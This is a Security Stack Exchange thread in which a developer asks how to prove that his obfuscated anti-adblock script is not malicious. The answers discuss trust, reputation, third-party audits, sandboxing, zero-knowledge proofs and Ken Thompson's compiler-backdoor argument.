31

I created my own anti-adblock system, that does something similar to services like BlockAdblock except mine goes about Adblocker detection in a different manner (and so far cannot be bypassed like ones such as BlockAdblock).

If you go to my Anti-Adblocker's page and generate some example anti-adblock code you'll notice it's all obfuscated (BlockAdblock also does this) which I've done to make it harder for filters and bypassing methods to be developed for it. The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work).

Each generation of this obfuscated anti-adblock code is unique, but they all perform the same action.

I can see that some potential users of my tool may not trust it, as they can't determine exactly how it works - Am I able to prove to my users that the generated code is not malicious without revealing the actual unobfuscated source? (because if I were to reveal the unobfuscated source code it would defeat the whole purpose of obfuscating in the first place)

pigeonburger
  • 671
  • 1
  • 4
  • 12
  • 79
    You are asking how to prove a negative. That's extremely difficult at the best of times. – schroeder Aug 15 '21 at 13:57
  • Comments are not for extended discussion; this conversation has been [moved to chat](https://chat.stackexchange.com/rooms/128614/discussion-on-question-by-pigeonburger-how-can-i-prove-to-users-that-my-obfuscat). – schroeder Aug 16 '21 at 09:43
  • 3
    The comments have devolved into a lengthy discussion about the project, and not the question. Please keep all subsequent comments about anti-adblockers to the chatroom linked above. – schroeder Aug 16 '21 at 09:46
  • 14
    Imagine for a second that I am a knife vendor and you are a buyer. I only sell knives to people who won't use them for harming others. Prove to me that you **won't** harm others. This is essentially the uphill battle with your code. – MonkeyZeus Aug 16 '21 at 12:05
  • 1
    Why can you not reveal the unobfuscated source? I thought the point of obfuscating was so that the obfuscated versions are all different from one another, and thus harder to detect? Obfuscation doesn't actually protect the unobfuscated code to any meaningful degree. – Fax Aug 16 '21 at 14:57
  • 1
    he CAN reveal the unobfuscated source... but how does he prove that the unobfuscated code is the same as the obfuscated? btw, I wouldn't get too hung up on proving you are trustworthy. That would only come with time. (or with popularity really... most people just think if it's widely used it must be trustworthy) – pcalkins Aug 16 '21 at 21:27
  • @schroeder can't prove a negative? Then flip the question around: "How can I prove to users that my obfuscated code **only bypasses ad-blockers** without unobfuscating?" (Not that I think you can...) – RonJohn Aug 16 '21 at 23:13
  • 6
    @Fax Because the code relies on the obfuscation to work. If this gets popular, there will be workarounds just as there are for the existing more popular products. This is an arms race that web sites are unlikely to ever win. – Voo Aug 17 '21 at 06:42
  • 1
    @pcalkins Easy enough. Assume the obfuscator can take code and a secret key (known only to website owners, the "users" of this tool) and produce an obfuscation of said code unique to that key. Publish the source of the anti-adblocker and the obfuscator. To verify that a given obfuscated code is not malicious, run the original source through the obfuscator with the key and verify that the result matches the obfuscated code exactly. – Fax Aug 17 '21 at 07:42
  • 4
    Is there a formal definition of malicious? I propose that all buggy code is malicious and all code is buggy ... therefor all code is malicious. It is just a question of whether the cost is worth the benefit. – emory Aug 17 '21 at 12:23
  • 1
    Obfuscation is in the eye of the beholder. – Carl Witthoft Aug 17 '21 at 13:16
  • Same way that people trust compiled applications whose source code they cannot inspect. For javascript, this falls under the general umbrella of [Subresource Integrity](https://www.w3.org/TR/SRI/). – J... Aug 17 '21 at 16:23
  • 2
    Clarification request - OP said: "The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work)." - would that not imply that any ad-blocker could circumvent your code by trivially modifying it? From whom are you hiding the workings, the site owner (to whom you are presumably selling this tech), or the ad-blocking public your code is countering? – JesseM Aug 17 '21 at 21:49
  • I cannot provide an answer, so I'll just try writing the answer in a small single line comment (as all answers here seem to miss the fundamental). But the major topic you are touching now is the halting problem. You are trying to prove that your program/black box will do x and never has outcome y. This is very similar to proving if a program would halt or not. When using a turing complete language this is fundamentally not possible. So your only solution would be to use a non turing complete language but something like an FSM. Then you can show that for any input a valid output is produced. – paul23 Aug 18 '21 at 09:01
  • 1
    Note about one specific statement in your question: "The code cannot be unobfuscated or tampered with" - this is incorrect, any obfuscation can be defeated with sufficient motivation (for example, here's the deobfuscated version of your code: https://pastebin.com/h9VxxZU0). – Rogach Aug 21 '21 at 22:07

16 Answers16

81

How can I prove to users that my obfuscated code is not malicious without unobfuscating?

Probably, you can't.

Maybe, if trusted persons were willing to audit your code (subject to NDA etc) and sign a static release with their PGP keys, then possibly more people would be willing to install your script with the confidence that it has been vetted by people who know what they are talking about...

In this world everything is based on trust and reputation. So my advice, if you want to pursue a career in programming, would be to establish that trust and build your reputation from now on. Consider doing some open source code too, and publish it on platforms like GitHub with a liberal license. And I think you already have a few repos on GitHub actually, so don't hesitate to link to your previous work.

If people can see your history and evaluate the quality of your coding practices (though terrifying when you think about it, these are the rules of the game...), they might be more willing to trust your code.

Maybe one day you will work in a software company, or create one, and you will sell closed-source, compiled code like MS-Windows. If your reputation is good enough, if your product is good enough, stable and priced right, your customers will accept it just like they buy other software products they need even though they will never see the source code.

Just curious, but have you tried online JavaScript deobfuscators like this one for example? Is your code sufficiently obscure yet after going through those tools?

What you have achieved is still security by obscurity, and JavaScript code can be traced with debuggers too. So, someone who has time on their hands and enough experience can figure out how it works. After all, this is client-side code which is not even compiled.

This can't be the most difficult reverse engineering job assignment on Earth.

I wouldn't worry too much about this at this point, my worry is rather that your invention is time-sensitive, and could even be rendered obsolete by a future version of Firefox or Chrome etc. Defeating adblockers is a never-ending race and everything you make in this area has a limited shelf life.

Stephen King
  • 201
  • 2
  • 12
Kate
  • 6,967
  • 20
  • 23
  • +1 for suggesting a (trusted) third-party audit. Theoretically, this is why we (the public) trust all kinds of systems, not just software. [Underwriters Laboratories](https://en.wikipedia.org/wiki/UL_(safety_organization)) (aka "UL") makes quite a brisk business doing nothing but making sure that products aren't doing anything wrong. – Christopher Schultz Aug 18 '21 at 13:42
52

It is not possible to prove that code isn't malicious if users cannot read it. The best you could hope for is a web-of-trust where a third-party certifies that it's not malicious, but that doesn't move the trust problem—it just creates an additional one.

From an end-user perspective, the code you're asking about is already malicious by attempting to circumvent my security arrangements. I don't need to see the code to know this, and I already avoid websites which tell me to turn it off because they already demonstrated a lack of desire to earn my custom.

Síle
  • 521
  • 2
  • 3
  • Comments are not for extended discussion; this conversation has been [moved to chat](https://chat.stackexchange.com/rooms/128803/discussion-on-answer-by-sile-how-can-i-prove-to-users-that-my-obfuscated-code-is). – Rory Alsop Aug 21 '21 at 17:29
19

Am I able to prove to my users that the generated code is not malicious ...

Probably not. Proving that some specific black box (your code) has a specific behavior and only this behavior is not possible without fully describing the intended behavior first - which basically means providing some form of code.

Just providing some sample input and let users generate sample output for example is not sufficient, since it can still be that some specific "magic" input will trigger a backdoor or similar.

Steffen Ullrich
  • 184,332
  • 29
  • 363
  • 424
8

Put it in a box with limited permissions. Prove that, even if the code inside the box were malicious, it could do no harm.

Max Murphy
  • 245
  • 1
  • 3
  • 10
    This is a [Homunculus argument](https://en.wikipedia.org/wiki/Homunculus_argument), as now the question is "How do I prove that the box is not malicious?" –  Aug 15 '21 at 20:35
  • 14
    On the contrary, the entire goal of e.g. capability based systems is to isolate what specific pieces of code can do. Auditing entire codebases is not usually practical, cost efficient or even effective. Hence the rise of putting things in boxes with limited permissions, there are many ways of doing this. An ad blocker could fundamentally be a function that is given an URL and that returns a bool, true for accept, no for block. The proof then needs to show that the box is strong, i.e. the code cannot break out, and proof that a bad set of decisions is not an unacceptable risk to the user. – Max Murphy Aug 15 '21 at 20:47
  • 1
    @MaxMurphy the code for your box to hold the blackbox is likely more complex than OP's application code... same goes for proving it does have certain properties. sandboxing is fine, but proving it is safe is fun and from an effort perspective imho only worthwhile if the same sandbox is used for multiple projects. – Frank Hopkins Aug 15 '21 at 23:22
  • 9
    Adobe spent twenty years trying (and failing) to do this with Flash. – Mark Aug 16 '21 at 00:11
  • 5
    @MechMK1 Except there are trusted sandbox systems with visible source code. – user253751 Aug 16 '21 at 08:32
  • 1
    Given that the application only checks if some js library from google adsense loads correctly or not, I can guarantee that the sandbox is going to be magnitudes more complex than that. –  Aug 16 '21 at 10:45
  • @FrankHopkins I am not a fan of reinventing the wheel. If there is a sufficiently good existing sandbox (there usually is), I would use that. – Max Murphy Aug 16 '21 at 18:48
  • 1
    @MechMK1 A box with limited permissions doesn't have to rely on obfuscation, so the argument is not recursive. – Dmitry Grigoryev Aug 17 '21 at 12:47
6

Basically, you cannot prove negative.

This includes, but is not limited, to proving absence of intended malicious functions or vulnerabilities that can be used in malicious way.

Obfuscation is not related to this fundamental problem.

What's worse, your obfuscation tool may (both intentionally and by mistake) introduce vulnerabilities that don't exist in your original code. This way your obfuscated code may be malicious without you knowing that fact.

What can be done, then?

You may ask a trusted (by both parties) third party to audit your (unobfuscated) code.

You may as well ask someone to audit your obfuscation tool.

You may be unlucky because no such trusted third party exists or you may not afford their services.

You may as well fail the audit. It happens.


The best tool you may use to build trust is your reputation.

fraxinus
  • 3,425
  • 5
  • 20
5

Ultimately, this is about trusting not just that the code works as intended, but that the obfuscation step doesn't add more, undocumented steps. Which ultimately means trusting the people who made the code being obfuscated, and the people who made the obfuscator.

I mentioned above in a comment about Ken Thompson's thesis on Reflections on Trusting Trust, and I'll attempt to summarize it for others as I understand it.

The target in Ken Thompson's thesis was the C Compiler, a tool used to convert C code written for human readability into machine code that could be run by the computer itself to achieve goals. For our purposes, it's similar to the obfuscation generation tool you wrote for your JavaScript ad blocker.

The attack in question on the C Compiler is described as such (Well, paraphrased):

1.) Write/find code that, when fed into the a machine-code compiled compiler, generates a version of the compiler from the source code you provide it.

2.) Modify your source code that you feed in so that the compiler that's produced is checking the lines of code it's compiling for specific patterns (i.e. a Login class/library), and when it detects that, add additional code in that area to provided additional functionality (i.e. "When checking for a username/password combination, if this password is provided, regardless of what the root user's password is, grant me root access before checking the rest of the code."). Now, no matter who writes or what is written into the Login code for, say, Unix, that compiler will produce a version of the Unix executable that contains your modified code.

3.) Add an additional step like Step 2.), but for when the compiler detects that it's compiling a compiler, add a step that, Step 2.)'s code and Step 3)'s code is not already added, add them back in, regardless of what the source code says.

4.) Compile your source code for the compiler using the machine code compiler that is compiling your source code into its own machine code compiler, then remove references in the source code of Step 2.) and Step 3.), and provide the machine code compiler you have just compiled to someone else (i.e. Someone working on the Unix codebase).

Step 3.) and Step 4.) allow you to have code that straight up doesn't give the game away that you've inserted backdoors into the compiler, while allowing you to have backdoors that means that, if someone tries to compile stuff, it generally works as expected, but you can't trust that it does specifically what it says it does, all the time. You would have to use a different machine code compiler to compile a version without the backdoor, if you were able to notice it at all.

What Ken Thompson makes a point of saying is that when code is being generated or run by a thing you did not personally create, you're putting your trust in the person who made the thing compiling your code, or executing your code.

What does this have to do with an obfuscator?

In this case, your obfuscator is essentially this compiler problem, in that, even if you gave them the original source code. When passed through your obfuscator to turn it into unique code that specifically adds the ability to avoid ad blockers via the changing of how it looks, how can they trust that the obfuscator doesn't add a few extra details?

The nominal and simple solution to this is trusting the people who made the obfuscator and the people who made the code fed into the obfuscator, but that is sometimes harder to gain at times.

Responding to a comment about proving one's own trustworthiness, since it's relevant to gaining trust:

I understand that this is also more of a reputation thing as well - if you have a trustworthy history as a developer (have I achieved that widely? probably in my city and immediate circle yes, probably not elsewhere)

This is somewhat dependent on a situation in question - in this case, one thing that could be useful is to show the obfuscator itself in regular, unobfuscated code itself, and let people test that particular program on programs they write themselves. (i.e. If they threw document.write() into the obfuscator, would that allow them to look at the resulting obfuscated code and verify that, as weird as it may look, it does do what their source intended to do?

If the obfuscator has been used by multiple projects, across different teams, that also helps, although you'll always be inching towards trust in the system you've created. As mentioned in the other comments, most people will likely resort to "Has it been used by others? Is it still being used by others? Then I'll trust that the developer has made code that I can trust, on account of trusting these other people who are trusting them, until someone finds that this is actually untrustworthy code.". In a sense, trust eventually becomes recursive, in a way that saves time in trusting code does what it says it does, and not having to definitively prove that no given step is adjusting things outside of what they're expected to do.

  • 1
    Thanks for converting your comment into an answer. – schroeder Aug 17 '21 at 06:37
  • If one writes a compiler in such a way that the machine code output would be computed in fully deterministic function from the source, then if one has multiple compilers, and know that at least one of them is trustworthy, and a machine which can run a piece of machine code receiving a particular file as input and producing a certain file as output, with no ability to do anything else, one could produce a compiler build that could not have any hidden functionality that wasn't in the source, unless every pre-built compiler one has access to contains the same hacks. – supercat Aug 17 '21 at 20:33
  • @supercat: Knowing at least one of them is trustworthy is doing a lot of work - you don't know that your trust is misplaced until you're hit with the backdoor. That said, I suppose that does claim one way they can give trust - by allowing the user to provide their own custom obfuscator instead of the site's default one to generate the obfuscated code from the source. – Alexander The 1st Aug 17 '21 at 23:00
  • 1
    @supercat People have already thought about counter-measures to such only-in-the-binary compiler attacks. See https://reproducible-builds.org and especially https://bootstrappable.org/ – das-g Aug 17 '21 at 23:01
4

A theoretical possibility is that you could implement a 'sandbox' virtual machine that was constructed so as to not have the capability of doing anything 'malicious', and then run your obfuscated code on that virtual machine.

Of course, the definition of 'malicious' depends on who you are asking. For example, an advertiser wants to advertise to people who might become more inclined to buy their product by seeing the advert. They don't want to advertise to people who so loathe and hate adverts and the people who push them that it would count as a huge negative against that company/product. It says "This product is sold by bad people, who don't care about or respect my wishes, don't respect me, and who are totally untrustworthy and hostile to me. People who are willing to make me angry, who will deliberately set out to annoy me, in the hopes of me giving them money." That's not a good marketing tactic. In fact, it has a huge negative value for the brand. (For which reason, advertisers ought to pay more for adverts that allow adblocking - they're more 'targetted' at a receptive audience.) And a website that tries to get more advertising 'views' this way in order to be paid more is ripping off the advertiser. You had might as well set up a bot to click on the adverts repeatedly to boost numbers - it would be far less damaging to the advertiser's brand.

There is an argument for those people who do not wish to provide a free service to people not to be tricked into doing so. If users are not willing to look at adverts, then they don't get to use the service, and an adblock detector that picks up the fact that adverts are being blocked and simply denies access (which I suspect is what is being talked about here) is morally arguable. However, it doesn't actually gain you anything, apart from personal satisfaction. The sort of people who use adblockers are people you specifically do not want to advertise to anyway. Someone furious because they feel they have just been forced to view your adverts against their will is not exactly in a receptive frame of mind to judge your offering fairly. So all that really happens is fewer people use the site, and thus you have less word-of-mouth recommendations to direct other readers there who do allow adverts. Maybe you're OK with that, and maybe that makes financial sense, if the marginal cost of serving those extra users exceeds the value of the good will. But for many purposes, a lot of users do see it as malice, and judge the propagators accordingly.

As such, no you can't prove that it's not 'malicious' as the users define it.

You would probably have been better off not mentioning what you was going to use the code for. The question of how to prove obfuscated code satisfies security constraints is an interesting one. It seems like an area where zero-knowledge proofs might have some application.

4

Software companies do not generally "prove" to their customers that their software is not malicious. (In this case, your customers are the web sites which will embed your code, not the end-users whose browsers it will execute in.) It is generally assumed that if you are in the business of selling software to paying customers, you would not deliberately include code which harms your customers, since doing so would be sabotaging your own business.

If potential customers feel that your company is sketchy or untrustworthy, they will not ask you to "prove" that your software is safe. They just won't buy from you.

Rather than trying to "prove" that your product is not malicious, make it possible for customers to hold you accountable, by having a registered company with a physical address and assets which you could be sued for if you do something really bad to them. That counts for a lot more than a purported "proof".

Alex D
  • 181
  • 3
  • 2
    I'd like nothing more than to be able to have users trust me by leaving proper contact details and being part of a proper company, but as I'm not yet 18, establishing my own business/company is a difficult task, and I'd prefer to protect my identity until then. In the future though, I definitely want to do this. – pigeonburger Aug 16 '21 at 10:06
  • 1
    @pigeonburger Then you'll have to look for customers who are trusting. Fortunately, most people are. – Alex D Aug 16 '21 at 10:07
2

Depending on your customer and their capabilities, you might be able to rely on a Zero Knowledge Proof. These are typically (always?) interactive proofs, where any given customer can develop a given statistical level of confidence.

The classic example would be a scenario where you know a path through a cave that has two entrances, and you wish to prove that you know this to someone else. Of course, if you just let them follow you through the cave, then they'd know the secret.

The solution to this classic example is for them to close their eyes, and you go into the tunnel. They then shout out "left" or "right," and you appear from the named entrance. If you know a path, you can do it 100% of the time. If you don't, you can only do so 50% of the time. But no information was released, so you can just repeat the experiment until the other party is sufficiently convinced.

There are several approaches which pull this sort of thing off by breaking up an operation into two steps, and then revealing the step requested by the verifier.

Of course, you'll still have to solve the issue of "how can I trust any arbitrary code." You'll have to deal with Rice's theorem. This is where approaches like the one supercat mentions in their answer. There are constructs, such as virtual machines and containers which can prove that no bad operation can occur with a syntactic proof. You just have to choose a technology which puts your particular verifier's definition of "a bad operation" into a bucket that can be captured syntactically.

One that I personally enjoyed was NaCl by Google. Native Client (NaCl) was a clever little sandbox based on process boundaries. It did some clever tricks with controlling jumps to ensure the client code could never access the "kernel" code in an unintended way.

In such a system, the sandboxing technology you use would become part of what could be quickly detcted, and thus needs to be obsfucated. You could give them a sandbox, and they could do one of two things with it:

  • Request that you de-obfuscate the sandbox to prove it behaves as promised
  • Request a copy of your software that can be run within the obsfucated sandbox.

With a lot of care (ZKP are hard), you can set it up so that the only way they can un-obsfucate your code is to request the sandbox be de-obfuscated and the code to install in the sandbox be delivered.

Cort Ammon
  • 9,206
  • 3
  • 25
  • 26
  • As an additional ingredient in the proof, one could supply hashes of both the de-obfuscated sandbox and the code that would be run within it, in advance of being told which piece of information they wanted. – supercat Aug 17 '21 at 20:37
2

You'll need to define "malicious" first. Perhaps you could claim that ONLY omitting,not modifying, http(s) display streams, performing no i/o including not storing any state information, makes it non-malicious.

Proving code claims is an extremely expensive and complex issue. A good first step would to to expose (unobfuscated) all browser call-backs and library entries. If the remainder is purely algorithmic (no i/o) and the interface is clear, you are close.

stevea
  • 56
  • 1
1

Put some serious money in an escrow account controlled by a trusted third party with worldwide trustworthy reputation. Then if someone can prove that your code is malicious, then he/she/party will get that money.

  • 3
    The nature of the obfuscated code makes your suggestion impossible since each generated code is unique. Your suggestion only works if the code is static and not dynamically generated. – schroeder Aug 16 '21 at 09:53
  • @schroeder I don't follow. What difference does that make exactly? The scheme explained above would work perfectly well even if each obfuscated bit of source is unique. – David Schwartz Aug 16 '21 at 17:47
  • @DavidSchwartz The context of the question is not the code generator, but the generated code. The dynamically generated code would have to be shown to be non-malicious. – schroeder Aug 16 '21 at 18:02
  • 1
    @schroeder This isn't about proving the code non-malicious. This is about giving people an incentive to prove the code malicious such that we can have some reasonable level of confidence that we aren't getting malicious code because nobody has claimed the incentive. I don't see how there being lots of different bits of code out there changes this is any way. A company could have any number of products (including one for each customer) and still use this same method to assure all of its customers that it's unlikely it ever gave out any malicious code to anyone. – David Schwartz Aug 16 '21 at 20:23
0

It may be possible to arrange to have the program contain a virtual machine that is written in an easily-understandable fashion, and which can be readily proven not to be capable of causing any intolerable side effects. Alternatively, it may be possible to write the program in such a way that it can be run from within an existing virtual machine that would meet such requirements (e.g. a web browser).

This would not preclude the possibility that a program which has access to certain confidential data and can deliver outputs to certain untrustworthy entities might steganographically conceal the confidential data within the outputs that are given to untrustworthy entities, but such smuggling data in such fashion would be impossible if all entities that are entitled to receive output from the program would also be entitled to receive any of the inputs which are fed to it.

supercat
  • 2,029
  • 10
  • 10
0

You can have an external, reputable company audit your code, build it, and distribute the dynamic binaries from their own infrastructure.

This way people getting the obfuscated code could trust someone else than you.

The key point here is that you hand over the distribution of audited code (well, the output of audited code) to someone that will provide more trust than yourself.

WoJ
  • 8,957
  • 2
  • 32
  • 51
  • I'm not sure this approach is practical (or that someone would host it) but it's a clever idea. "Transfer the risk" – schroeder Aug 18 '21 at 16:27
  • @schroeder: this approach is used by some enterprises for very sensitive code (usually with the addition of an escrow). – WoJ Aug 18 '21 at 16:46
-1

A thing that was not discussed in the other answers (but that is probably only of theoretical interest) is the ability to provide, with the obfuscated program, a formal proof of invariants. But is assuming your customer(s) would be able to formulate the "non-maliciousness" as a set of such invariants.

matovitch
  • 99
  • 1
  • While the idea appears nice, it does not even work in theory: the list of invariants is finite. How do one proves that no invariant was forgotten? You also have to prove the correctness of the JavaScript interpreter (good luck with that) and of the hardware executing it. That's not even counting the cost to make such proofs: it would be prohibitively expensive. – A. Hersean Aug 18 '21 at 12:40
  • @A.Hersean Every method is inperfect and all your points are valids. But if the invariants are carefully chosen, that you trust the interpreter, the machine running the code, and the proof assistant checking the invariants (which should be reasonnable assumptions), it should increase your confidence in the "non-maliciousness" of the code, which is all you can reasonnably ask for. – matovitch Aug 19 '21 at 05:34
-1

The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work).

Um, the CPU that executes said code would like to have a word about the fundamentals.

I have no idea what you'd mean by "the code cannot be unobfuscated": either the thing runs on some platform (presumably the user's browser), or not. If it runs, and if you're not using some DRM black-box channel to send the real code for execution to a trusted enclave deep within the user's machine, then unofuscating it is just a matter of time. There's no unobfuscatable obfuscation. The code simply wouldn't work.

Now, yeah, you may be leveraging some platform introspection to ensure that most blatant attempts at modification at runtime will be detected. But that goes out of the window as soon as you're dealing with someone who doesn't run an unmodified platform. It's not very hard to let the JS introspection and DOM see the unmodified code while the VM actually runs something else :)

-1

The only reasonable way to achieve your goal is by building the reputation. Otherwise, even if the today's version is safe, it is always possible to say the malware is coming in the next version.

One approach is to use something like Wayback machine to prove that our site is online (an your product is being offered) for quite a long time. It is problematic to keep a malware site online for five years as if nothing. Also, register the official company and provide the real identity.

h22
  • 901
  • 6
  • 10